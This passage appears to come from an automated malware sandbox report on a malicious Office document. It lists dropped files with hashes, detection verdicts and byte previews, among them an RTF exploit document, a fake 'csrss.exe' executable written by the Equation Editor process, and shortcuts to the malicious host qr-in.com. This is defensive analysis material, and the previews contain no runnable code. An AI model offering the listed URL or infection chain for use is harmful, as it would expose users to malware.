Preview:	{\rt..............{\\fillDztype300836618 \.}.{\529557164.!3&,[9%-4?~`%0)@3!#.~~0:/?09/?1.0$,???48%:\|9;@@,_\|<'%),'1+=.6%$7.@?.984;.0>\|.%1^8]58~[&'6`2)?6#?=-2@<>;.[6'8/:#52-:,%;=00[<)???#>-8'-?#!.<~8]%/?/.\|@''%'0?'9_.$@60..5;[+6\|)`%]!16)3(?7&_%$\|'~^?(11./74??%2#8%/?~)5,/0?.52??;$>.]+'?^~6(?.$8)9;?>_?.%37?[.5?3(8(/~:#2[6?&+%\|?86!5(3?!8-(5$%&-%[('%/?43-\|6\|/>?&??5:;'[+59&;9!>\|@[(??8]]35???.`?.5+..!.<[%<3?~6@?89/=>(=?<+6??5~)5:$@.~5<<:)#,1;?>($#>#4[45<~+[-:?6-<5.??8-1%?6'=9?\|!~1__7):/0'(?:(&'?]($/)7%5\|+2.8(&/<,;.?_($84#/7%+?8.)~$`3.#,.])-3/2_?<.?%>.?.4.=?%87?0[?51#_4.#^(39`@~?~~\|@66=`@0%~#?)?-!7_#?$<3[%2\|)<9&.<??'8;%]?1?[2,'[5;5(??@[2%?=5??@5$(!.=?~!\|3?~`.`!)?3#05..~62$?</+>.56;/<?,%;97('-8.:?@2(?,>22^?732`4./[7/(%66_=)(]0645-.6-,4`?.4.5_\|9(2$1$??4(-\|.#?9?.??:.0;:..49;\|&?.6/./.?[,0#.-/24\|.%<+,=%[#5?;!?-4='-%437(&$]9.9[1@?.:?8?6.9'+?<5.~+.?>),?(.:\|79@8??[51?<9?]-;;(@&4)2/^8.(]67('!9$$3:`.&2~'3<:?.$$._?=?-??./.\|!&1^#<49_>50?^.?_?5,_###;#^:~21@.?=-3@!#_!:%<4=8~:\|]=(!'-^./@.-

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\csrss[1].exe

Download File

Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1388544
Entropy (8bit):	5.5299258127514435
Encrypted:	false
SSDEEP:	24576:AP+g7Wy3xfMZKdcKtTjbJ4HEEEEEEEEEEEEEEEEEEEETKKKKKKKKKKKKKKKKKKK7:A/iy3g6TjbsEEEEEEEEEEEEEEEEEEEE+
MD5:	913C99449A29C2640D36B0D5FDF69289
SHA1:	858971F52AB45DC8BE5F2C43DA9B0C25BA398435
SHA-256:	39475882127FD9789D9C23444153A4A4841F3FFBB34FFABB0C540E6E9D76D034
SHA-512:	B35A9A28D01A948455DA4D078D9F9D1AACB5E9FFF5C8359B4278400E29296C75FF96554AE6CC8CD4F53D1DB8525D43927C87B793E3FB2E72549D944FD62A6D96
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 21%
Reputation:	low
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................X......(.............@..............................................@...........................@..@%...............................k...................................................F...............................text............................... ..`.itext..p<.......>.................. ..`.data...P...........................@....bss.....6...............................idata..@%...@...&..................@....tls....4....p...........................rdata..............................@..@.reloc...k.......l..................@..B.rsrc................t..............@..@.....................0..............@..@................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\231FB2C7.emf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	43884
Entropy (8bit):	3.126772283765275
Encrypted:	false
SSDEEP:	384:r8kX2fappvT5WyjVG3FzDjZCaI5FHtHFuYP:rxNLNjVwGFHtHFvP
MD5:	DC215B4EFF44EBE3A5F50911BC201283
SHA1:	A2AE0A6D9E4AA92D7EAFF947D4E53F2DA1A6D657
SHA-256:	9DDC1CDF5B5730F2C4A08B6744D119C1BAB9FADA452645563E7E7DBE4907E89D
SHA-512:	C9BBB1B7B79D8D3F63488A098CF9D437B352B38ABB43E2755B019418F393A5DC80E241FCD102430A6BB7F25CC72C5C324397D6CE8E55E1FB035D2B24B7E9172C
Malicious:	false
Reputation:	low
Preview:	....l...........;...............~@..xW.. EMF....l...........................j.......................{.......F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..............................................<.......%...........%.......................R...p................................@..T.i.m.e.s. .N.e.w. .R.o.m.a.n...........................................................................=........................................ .E..........................G................*..Ax...N..............T.i.m.e.s. .N.e.w. .R.o.........6...............P...................................................dv......%...........%...........%.......................T...T...........+...q........i.@...@....Z.......L...............<.......P... ...,...............T...T...,.......W...q........i.@...@,...Z.......L...............<.......P... ...,...............T...T...X...........q........i.@...@X...Z.......L...............<...

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\31682C44.png

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 1008 x 529, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	116917
Entropy (8bit):	7.962967514652866
Encrypted:	false
SSDEEP:	3072:K34UL0tS6WB0JOqFVYGQcARI/McGdAT9kRLFdtSyj:k4UcLe0JOqPQZR8MDdATCR3tSw
MD5:	460EFCF478D05AFB04311BA4833B41FB
SHA1:	35A00E81ED5AA915810702E9BA42E0D6E9E24BA1
SHA-256:	ABBF9B20F57F85EDAD5D5B5848335775428B47D1A48C0772A72D7A6C136D9C51
SHA-512:	C5C6414B88579ADF217DE22C52C1CCB244EB532DED4B2533136D54D1D0F2EC474C36E2BC163FB9BCE05079AD06313B559C9746F73BC82FF42933EB1A3B94DD07
Malicious:	false
Preview:	.PNG........IHDR..............0V.....sRGB.........gAMA......a.....pHYs..........+......iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?>.<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c137 1.000000, 0000/00/00-00:00:00 ">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:ns1="http://www.day.com/dam/1.0". xmlns:tiff="http://ns.adobe.com/tiff/1.0/". xmlns:dc="http://purl.org/dc/elements/1.1/". ns1:Physicalheightininches="-1.0". ns1:Physicalwidthininches="-1.0". ns1:Fileformat="PNG". ns1:Progressive="no". ns1:extracted="2018-06-11T14:21:13.228-07:00". ns1:Bitsperpixel="8". ns1:MIMEtype="image/png". ns1:Physicalwidthindpi="-1". ns1:Physicalheightindpi="-1". ns1:Numberofimages="1". ns1:Numberoftextualcomments="0". ns1:sha1="a5883b71b35060c98e8449851de4fae668c6ea9d". ns1:size="54990". tiff:ImageLength="727". tiff:ImageWidth="1020". dc:format="

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\398EA60A.doc

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	ISO-8859 text, with very long lines (5166), with CRLF, CR, LF line terminators
Category:	dropped
Size (bytes):	37178
Entropy (8bit):	3.5174036971121247
Encrypted:	false
SSDEEP:	384:VhZXB+50YucHlzQ5T/jlCOTbtbYtcQIukOOOjovKd4gqZjRiOMM2L42IVmJQzL+t:VhZg2Y/0T0Tc038lZZvmFn
MD5:	E22EC5F92111A7CA5FC66630C27C7BB9
SHA1:	E2D0AC4192C7C961F561678750299292DDCDDCA8
SHA-256:	1761EC4983A70F982282C58697628F98C42E8F2197874BE62348445A53CCE51A
SHA-512:	A292DC5C0BB8740481AD9CD22F51175E3A640115D440034633498FDE7345B29C12BD203AFED50B6889FEB427CC69A93E1A95070DA7B860F494231A12D85B1F3A
Malicious:	true
Yara Hits:	Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\398EA60A.doc, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	{\rt..............{\\fillDztype300836618 \.}.{\529557164.!3&,[9%-4?~`%0)@3!#.~~0:/?09/?1.0$,???48%:\|9;@@,_\|<'%),'1+=.6%$7.@?.984;.0>\|.%1^8]58~[&'6`2)?6#?=-2@<>;.[6'8/:#52-:,%;=00[<)???#>-8'-?#!.<~8]%/?/.\|@''%'0?'9_.$@60..5;[+6\|)`%]!16)3(?7&_%$\|'~^?(11./74??%2#8%/?~)5,/0?.52??;$>.]+'?^~6(?.$8)9;?>_?.%37?[.5?3(8(/~:#2[6?&+%\|?86!5(3?!8-(5$%&-%[('%/?43-\|6\|/>?&??5:;'[+59&;9!>\|@[(??8]]35???.`?.5+..!.<[%<3?~6@?89/=>(=?<+6??5~)5:$@.~5<<:)#,1;?>($#>#4[45<~+[-:?6-<5.??8-1%?6'=9?\|!~1__7):/0'(?:(&'?]($/)7%5\|+2.8(&/<,;.?_($84#/7%+?8.)~$`3.#,.])-3/2_?<.?%>.?.4.=?%87?0[?51#_4.#^(39`@~?~~\|@66=`@0%~#?)?-!7_#?$<3[%2\|)<9&.<??'8;%]?1?[2,'[5;5(??@[2%?=5??@5$(!.=?~!\|3?~`.`!)?3#05..~62$?</+>.56;/<?,%;97('-8.:?@2(?,>22^?732`4./[7/(%66_=)(]0645-.6-,4`?.4.5_\|9(2$1$??4(-\|.#?9?.??:.0;:..49;\|&?.6/./.?[,0#.-/24\|.%<+,=%[#5?;!?-4='-%437(&$]9.9[1@?.:?8?6.9'+?<5.~+.?>),?(.:\|79@8??[51?<9?]-;;(@&4)2/^8.(]67('!9$$3:`.&2~'3<:?.$$._?=?-??./.\|!&1^#<49_>50?^.?_?5,_###;#^:~21@.?=-3@!#_!:%<4=8~:\|]=(!'-^./@.-

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CE2FF046.emf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	631964
Entropy (8bit):	1.8955511157617846
Encrypted:	false
SSDEEP:	1536:V55XsmuHoShA5q/ri+lGnSfKcfu50y7eMGn5v1IN6zJ8Tqbb0z88eqlYizq2:lMZu50yknG/qc+j6
MD5:	402E85A1D79CB8CD52BE8098F3967D50
SHA1:	35FB6B210AA34E65D315C7E2C49A3B5CD416F8F4
SHA-256:	C1BAB1399C674CE9DCF811D19398EF01719F506E6B4BCC38AECF5B13A9B03070
SHA-512:	3641C5DD22F198C7C192B90E4325F0ECFF53741FC7F3F18CEA9BCD15DE472B90228D3538A22C5F9C152F56D29FD7B056D345444487A26EB6B3591001C5C713D6
Malicious:	false
Preview:	....l................................5.. EMF................................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...........................................................L...d...............N........... ...O...!..............?...........?................................'................ `.....%...........(.................... `.L...d...............N...........~...

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DF465E1C.emf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	979052
Entropy (8bit):	3.348534840206666
Encrypted:	false
SSDEEP:	6144:8FOSyw4UcLe0JOqDQZR8MDdATCR3tSpjqcY:RUP/qDQZR8MxAm/SNnY
MD5:	E1E8FD8A97AECB2DEA6BD5BBA97A6256
SHA1:	8EA26370D07429A04F95BAF56DF38127DB452A3B
SHA-256:	8F4CDC47129C005567662B5FAAD3E38267C4B109721ECA4130C037D5B3EA7084
SHA-512:	14986C79D66FC9FE0552BA0992898118F2EA3DA5EF65409F7936655136EC7AE18EC4B6F63208B1B7A6D51C9784FA36953DA51BEC9391F9D85A7D9F606AF4028B
Malicious:	false
Preview:	....l...........................{....9.. EMF....l...............................@...........................F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...................................................o..."...........!...................................................o..."...........!...................................................o..."...........!...................................................o..."...........!...................................................o...'.......................%...........................................................L...d...............>...............?...!..............?...........?................................'................ `.....%...........(.................... `.L...d...............>...............

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{618DEECE-5CD1-42E4-A158-87A2956FA503}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	15872
Entropy (8bit):	5.753002848532677
Encrypted:	false
SSDEEP:	384:cdPswx6w8PfwTwkPfw0w9Pfw0wBPfw0w:Tc6wcSwk5wZ5w15w
MD5:	98E18DD95EB54D1627B02BE74E303FE4
SHA1:	D20EC8D5276383AFC694FAA571609B0770AAF53B
SHA-256:	6424A8A831313EF1642A2DB994F6EDEA6C42954A51098CBD99035466ABC9C44C
SHA-512:	FF21D00623A8BF3559A54D16F5201D3C263AEB9328CF40EF5603E074C026623D59C9D2A6C95D2B5A186149EDF36748B8BC58151EB75F3B22BF57EE07D7ED98C5
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{87E49C37-2599-44D8-9E6F-4BD53AF0A3D0}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	11264
Entropy (8bit):	3.6203495433609256
Encrypted:	false
SSDEEP:	192:DK/77uggkjluvMuB31A0pL+/6R/EIYrF7YWnORYaZjBnDPTCAQN:DKOVgQN1D5EIYrF8WuhtBnrqN
MD5:	334E338FCF954C90610E6C3DB934CC35
SHA1:	DEBCE122A7EDE20547E139AB1C4AF316587F23CC
SHA-256:	2D99786978A94977416D0BF85CEE2C9B798667D733F1FF2811AC621A35A20D23
SHA-512:	1880ED6C2137E4227D73F7ADA3C7F4F65AC36044FA557322746FA3B09F171745025C67ED0D8DC82B59868E27E23789E5941994A9AE77555305155C46D5589B29
Malicious:	false
Preview:	....................2.9.5.5.7.1.6.4...!.3.&.,.[.9.%.-.4.?.~.`.%.0.).@.3.!.#...~.~.0.:./.?.0.9./.?.1...0.$.,..?.?.?.4.8.%.:.\|.9.;.@.@.,._.\|.<.'.%.).,.'.1.+.=...6.%.$.7...@.?...9.8.4.;...0.>.\|...%.1.^.8.].5.8.~.[.&.'.6.`.2.).?.6.#.?.=.-.2.@.<.>.;...[..6.'.8./.:.#.5.2.-.:.,.%.;.=.0.0.[.<.).?.?.?.#.>.-.8.'.-.?.#.!...<.~.8.].%./.?./...\|.@.'.'.%.'.0.?.'.9._...$.@.6.0.....5.;.[.+.6.\|.).`.%.].!.1.6.).3.(.?.7.&._.%.$.\|.'.~.^.?.(.1.1..../.7.4.?.?.%.2.#.8.%./.?.~.).5.,./.0.?...5.2.?.?.;.$.>...].+.'.?.^.~.6.(.?...$.8.)..9.;.?.>._.?...%.3.7.?.[...5.?.3.(.8.(./.~.:.#.2.[.6.?.&.+.%.\|.?.8.6.!.5.(.3.?.!.8.-..(.5.$.%.&.-.%.[.(.'.%./.?.4.3.-.\|.6.\|./.>.?.&.?.?.5.:.;.'.[.+.5.9.&.;.9.!.>.\|.@.[.(.?.?.8.].].3.5.?..?.?...`.?...5.+.....!...<.[.%.<.3.?.~.6.@.?.8.9./.=.>.(.=.?.<.+.6.?.?.5.~.).5.:..$.@...~.5.<.<.:.).#.,.1.;.?.>.(.$.#.>.#.4.[.4.5.<.~.+.[.-.:.?.6.-.<.5....?.?.8.-.1.%.?.6.'.=.9.?.\|.!.~.1._._.7.).:./.0.'.(.?.:.(.&.'.?.].(.$./.).7.%.5.\|.+.2...8.(.&./.<.,.;...?.._.(.$.8.4.#./..7.%.+.?.8...*.).

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{D0D958B5-951A-4A27-9413-24CAB07F0670}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	0.05390218305374581
Encrypted:	false
SSDEEP:	3:ol3lYdn:4Wn
MD5:	5D4D94EE7E06BBB0AF9584119797B23A
SHA1:	DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:	95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\{150F9DC4-C38F-43DD-B6F6-5D9AA5AB0597}

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	0.02568179153757395
Encrypted:	false
SSDEEP:	6:I3DPcHnCvxggLRbQ4UrZzFRXv//4tfnRujlw//+GtluJ/eRuj:I3DPT3Q4yZfvYg3J/
MD5:	1CA4F988D7E4EF4BADE6AF3F29DCFCDC
SHA1:	8585098DF832531CF158AEAAAEF3977304D021A6
SHA-256:	ED9BDFD3E586DB7D368C8EB197A370468FB5925C495ACFD74EDD17C6562F2E74
SHA-512:	F5BD06AE0142152CA9FE111D7A36D947C4AAC12D2E246ECA611ADF038178814A36C998864DE4419CBAA4FD3F79C9C04E991ED39996014C55295BAEE61FB80379
Malicious:	false
Preview:	......M.eFy...z..v.O..E..;....MS,...X.F...Fa.q.............................*..7..I.0) ".............;...A..t..:.......................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\{5213A195-86D2-4FBA-AD01-988FE447C89A}

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	131072
Entropy (8bit):	0.025596195216858054
Encrypted:	false
SSDEEP:	6:I3DPcQpozOS1HvxggLRDwNs6XlJRRXv//4tfnRujlw//+GtluJ/eRuj:I3DPt/SRvw+6DvYg3J/
MD5:	D1D87E2710CC3F41315F1BC7B54A7B96
SHA1:	2227E90B5E18287ACE4E09C924C32585B237CB5E
SHA-256:	29A25C6C44F5CCF8A292B9EE2861851F08F467CA5F131726CB65149FC1E649BB
SHA-512:	13AC5212A36F96B8FB4A7C5D8B05FED2B9F678FA6E14E2C5D0356BC1F7910469A16A4A15E0A5CDD201CB70CB0B67D5A2CF029A71EE8DE3AE1ABDF48AF4393073
Malicious:	false
Preview:	......M.eFy...z..*..5.M...4N.t.S,...X.F...Fa.q............................T...].I..Wx:.5.........gY.....@.....@.......................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF09A8EA68CC7643E2.TMP

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF5534031E748409A6.TMP

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	7.405677094999999
Encrypted:	false
SSDEEP:	3072:u4DA2v34UL0tS6WB0JOqFVYGQcARI/McGdAT9kRLFdtSyFq:u4DA2v4UcLe0JOqPQZR8MDdATCR3tS5
MD5:	F6CAB1AC73314002CB06D2FC2311B8AB
SHA1:	16CD5181E995605CC1061B7E4986A5C6378BCF70
SHA-256:	6DEB26DDE281E8E41A0140B5A4445DFCBCD94FD79939D438EA88B220CC5729CC
SHA-512:	4D155279BA2B4AEA18E1D5C0B00BE0BB1043894A18AB5FC3834817550914E298621E9050AD01DFAD0064272CCD470E5B0F4F425AA0A647A842B9FE1F7D5073E2
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF78F515A159E2AA69.TMP

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	142336
Entropy (8bit):	7.890080062147666
Encrypted:	false
SSDEEP:	3072:I4DA2v34UL0tS6WB0JOqFVYGQcARI/McGdAT9kRLFdtSyF:I4DA2v4UcLe0JOqPQZR8MDdATCR3tS
MD5:	5FA2F9CE5CE6AEC6DDA6859FF8A8DAFE
SHA1:	B2F56E0F5BEA772E3CD5768F9C4F2881564DE505
SHA-256:	4E52755442743ADE0EE9A5969FCF7566FEE0C6508E743D0852E570BD26F0B47C
SHA-512:	EEA7CA3317A9B280B8B5650A2F8A88E5E3E97DF6784A47474E3C3A999E457F506E1A4D27F4E7ADEB191411FA80625AE73910EAE3CF60BDC4FE65E96A1488D5D0
Malicious:	false
Preview:	......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

C:\Users\user\AppData\Local\Temp\~DF97E38B879C1DA766.TMP

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\NAvSGzZ.url

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows 95 Internet shortcut text (URL=<http://qr-in.com/NAvSGzZ>), ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	50
Entropy (8bit):	4.768367439558377
Encrypted:	false
SSDEEP:	3:HRAbABGQYm/yYMLaZy:HRYFVm/vo
MD5:	B3EB7746BC094053F5005B355A2EC080
SHA1:	065DF25D416F8E51756BB6290812A04D77BEF585
SHA-256:	E95B8407F424AAA4CE4C79D4FD66BBA23D6B2E0AFA5E7C5273E72DFE01915298
SHA-512:	CAAFDC4134949D15CBF6BC0B15BFA6659F9D4575B4E9AB4146D444E72831057378696916699578A75B4E2177EADBDD5F59885BC3278DB4E5ED5A91E57743B39A
Malicious:	true
Preview:	[InternetShortcut]..URL=http://qr-in.com/NAvSGzZ..

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Generic INItialization configuration [xls]
Category:	modified
Size (bytes):	152
Entropy (8bit):	4.980455622523978
Encrypted:	false
SSDEEP:	3:bDQSKRS1IAAmQRfjipve0EMmUmMt7mQRfjipve0EMmUv:b/KRS19AnjUve0lht7njUve0ll
MD5:	20D5DDC41AB60339D96D9A82DEF62E31
SHA1:	39D3CE49C6C7D995D91CBDF61AFB393136C2D74F
SHA-256:	0ECBA6E6094104A4166AEAA5CFA4B505669B5583272B3675E1C65310C25F7D7E
SHA-512:	ED5F11FD726AF2795C9EA45D0EDF63A1C4F85CA364A03F8B769FFDA1CE0B30CA7DD9372168B46BB4EF1CED782177B2D75C7F457A33F82595BB0596673D1C2B72
Malicious:	false
Preview:	[folders]..NAvSGzZ.url=0..qr-in.com.url=0..Home Purchase Contract and Property Details.LNK=0..[xls]..Home Purchase Contract and Property Details.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\qr-in.com.url

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows 95 Internet shortcut text (URL=<http://qr-in.com/>), ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	43
Entropy (8bit):	4.454766207938903
Encrypted:	false
SSDEEP:	3:HRAbABGQYm/yYMLavn:HRYFVm/Zvn
MD5:	BCE27C32D9E5CC59720E561F056B8C16
SHA1:	9D49F75E362B1CD11BEDD75632A0ACFFB4B1F1F5
SHA-256:	4166C0FFD11057DC2E21EE3BE8D7C77EF00D0F9CC12F005AE2DB7C9C3DF7076B
SHA-512:	9720C341D103034D605C4C3BC121D18E0ADE4051702C2ACA9ABAE6A1468A65AB129D126BE9B042AE7C3F2CCEF99B8A66E26C6ED41B695BF98F6B0B02CBEA3892
Malicious:	true
Preview:	[InternetShortcut]..URL=http://qr-in.com/..

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.4797606462020303
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyWzUbGabuW0iWVlfln:vdsCkWtqb9bt2dl
MD5:	B33B8593034E436C71DA5820F309CDF3
SHA1:	61021B359E9ECBEBA3A941C907F03C4C7002F58E
SHA-256:	82732B2A3E81F7CBE7A72A4DDA5679175EB54FF45A331B743F768739E4E45975
SHA-512:	2CA8AB8261B68676E34E0B1D7BCD14064B7EFE9AB28C6071FEBB13B056D547782F5DECE788115AFFF9EC35A85B8BF6957DA725E82D0E276419FA64AF9FC79D85
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p........1@..............2@.............@3@..............3@.....z.......p4@.....x...

C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\UZ61X6P3.txt

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	ASCII text
Category:	dropped
Size (bytes):	70
Entropy (8bit):	4.093789131356648
Encrypted:	false
SSDEEP:	3:X6RWAWNdcSNvT6h8yTTQFX:qRdyeUGyX
MD5:	82E76F73B4279F0420326B9AEB35CC2C
SHA1:	C8D42AA3ECE0A959A32213D2C4409671516DB68D
SHA-256:	F3B86932EDD3854BE843901ABE76B12F98A03368B716368687E6DDADA2E51DF8
SHA-512:	A152A02B2E9ACC78E44268001E72C4C26614D8E2732C593DB64D80CA418A8A6916D354D0DFA0260F188C017CFA2ABA6AADA6851418FB50B1B10D1657D3EC79D4
Malicious:	false
Preview:	short_4348.1.qr-in.com/.9728.169636864.31108416.4056684366.31108413.*.

C:\Users\user\AppData\Roaming\csrss.exe

Download File

Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1388544
Entropy (8bit):	5.5299258127514435
Encrypted:	false
SSDEEP:	24576:AP+g7Wy3xfMZKdcKtTjbJ4HEEEEEEEEEEEEEEEEEEEETKKKKKKKKKKKKKKKKKKK7:A/iy3g6TjbsEEEEEEEEEEEEEEEEEEEE+
MD5:	913C99449A29C2640D36B0D5FDF69289
SHA1:	858971F52AB45DC8BE5F2C43DA9B0C25BA398435
SHA-256:	39475882127FD9789D9C23444153A4A4841F3FFBB34FFABB0C540E6E9D76D034
SHA-512:	B35A9A28D01A948455DA4D078D9F9D1AACB5E9FFF5C8359B4278400E29296C75FF96554AE6CC8CD4F53D1DB8525D43927C87B793E3FB2E72549D944FD62A6D96
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 21%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................X......(.............@..............................................@...........................@..@%...............................k...................................................F...............................text............................... ..`.itext..p<.......>.................. ..`.data...P...........................@....bss.....6...............................idata..@%...@...&..................@....tls....4....p...........................rdata..............................@..@.reloc...k.......l..................@..B.rsrc................t..............@..@.....................0..............@..@................................................................................................

C:\Users\user\Desktop\0B430000

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
